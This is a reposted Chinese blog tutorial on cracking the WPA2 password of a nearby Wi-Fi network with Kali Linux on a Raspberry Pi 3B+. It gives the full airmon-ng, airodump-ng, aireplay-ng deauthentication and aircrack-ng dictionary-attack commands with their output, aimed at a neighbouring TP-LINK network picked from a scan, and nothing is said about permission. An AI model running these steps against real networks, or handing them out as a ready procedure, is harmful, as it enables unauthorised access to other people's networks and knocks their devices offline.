树莓派3B+ 破解Wi-Fi密码

树莓派3B+ 破解Wi-Fi密码

树莓派3B已经成为arm主流开发板,不仅有成熟完善的raspbian系统,还可以安装Ubuntu、Centos、Kali系统,因此,树莓派可以做各种各样的事,接下来,我就介绍下树莓派破解Wi-Fi密码的过程。

1.安装Kali

因为Kali是一个专门的网络渗透系统,自带很多工具,所以就采用直接安装Kali来使用airmon-ng工具。
下载地址:https://www.offensive-security.com/kali-linux-arm-images/

《树莓派3B+ 破解Wi-Fi密码》

下载下来是kali-2017.3-rpi3-nexmon.img.xz文件。
在Windows下直接使用解压缩软件解压。
在Linux下用 xz -d kali-2017.3-rpi3-nexmon.img.xz 解压。

得到的img文件就可以直接使用了,将其写入TF卡即可。

2.升级Kali

将树莓派插上显示屏和鼠标键盘。
用户:root
密码:toor

# 打开Terminal,执行
echo "deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free" > /etc/apt/sources.list
apt update && apt upgrade -y

# 安装完整版kali
# apt install kali-linux-all

# 安装Extend Filesystem(可选)
# apt install gparted -y

# 安装xrdp [不能插上显示屏使用]
# apt install xrdp
# 开机自启
# update-rc.d xrdp enable

3.开始破解

破解过程如下:

  • 找到设备iwconfig并开启监控
  • 查看附近的Wi-Fi,并选择一个
  • 攻击并开始抓包,得到handshake
  • 下载字典,开始破解
# 查看得到网卡名为wlan0:
iwconfig
# 内容如下:
eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  ...

# 找到Wi-Fi代号为wlan0,接着启动monitor模式:
airmon-ng start wlan0

# 查看附近的无线网络
airodump-ng wlan0mon
# 内容如下:
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                             

 F2:B4:29:E5:1C:74   -1        0       20    0   6  -1   OPN              <length:  0>                                      
 94:77:2B:47:92:1C  -74      119     1842   49   7  54e  WPA2 CCMP   PSK  HUAWEI-RF4BXM                                  
 14:75:90:DB:90:91  -81       53        0    0  11  54e. WPA2 CCMP   PSK  TP-LINK_DB9091    

# 选择一个Wi-Fi,复制BSSID,记下CH信道,组合如下命令开始攻击抓包
# [演示选择TP-Link:airodump-ng wlan0mon --bssid 复制的BSSID -c CH信道 -w 保存名]
airodump-ng wlan0mon --bssid 14:75:90:DB:90:91 -c 11 -w wificrack

# 可以看到,有一台设备连接到该路由WiFi,但此时没有设备连入,故抓不到完整4步握手包。
# 若抓不到4步握手,则通过以下命令断开设备与WiFi的连接,使其重新建立连接从而可以抓取四步握手信息:
# 新开一个Terminal窗口:[参数:攻击2次,路由ssid和设备Mac地址]
aireplay-ng -0 2 -a 14:75:90:DB:90:91 -c 54:DC:1D:27:0D:50 wlan0mon

# 原窗口得到握手包:内容如下:
 CH 11 ][ Elapsed: 5 mins ][ 2018-01-29 05:52 ][ WPA handshake: 14:75:90:DB:90:91                                           

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                         

 14:75:90:DB:90:91  -71  93     3136       43    0  11  54e. WPA2 CCMP   PSK  TP-LINK_DB9091                                

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                  

 14:75:90:DB:90:91  54:DC:1D:27:0D:50  -39    0e- 0e     0       44  TP-LINK_DB9091 

通过ls wificrack*命令查看抓到的信息保存的文件(多的wpa包是之前做测试保存下来的):

这里看最新的那个即wifi-04即可,可以看到总共有4个。

# 后面使用Kali Linux中默认存在的字典,目录[需要使用命令来解压]
/usr/share/wordlists/rockyou.txt.zip
# 这里顺便记录一下Kali中几个常用的字典文件的位置:
/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists

# 如果没有该文件,就需要下载:
wget http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt

# 破解:[rockyou.txt是字典、wifi-01.cap是抓包]
aircrack-ng -w rockyou.txt wificrack-01.cap
# 结果如下:[密码为:12345678]
                                 Aircrack-ng 1.2 rc4                                                                        

      [00:00:00] 4/4 keys tested (31.56 k/s)                                                                                

      Time left: 0 seconds                                     100.00%                                                      

                           KEY FOUND! [ 12345678 ]                                                                          
# 关闭wlan0无线网卡monitor mode
airmon-ng stop wlan0mon
    原文作者:八皇后问题
    原文地址: https://blog.csdn.net/kxwinxp/article/details/79187472
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞